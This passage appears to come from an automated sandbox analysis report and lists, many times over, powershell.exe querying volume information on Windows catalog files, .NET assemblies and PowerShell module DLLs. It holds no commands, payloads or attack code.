                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
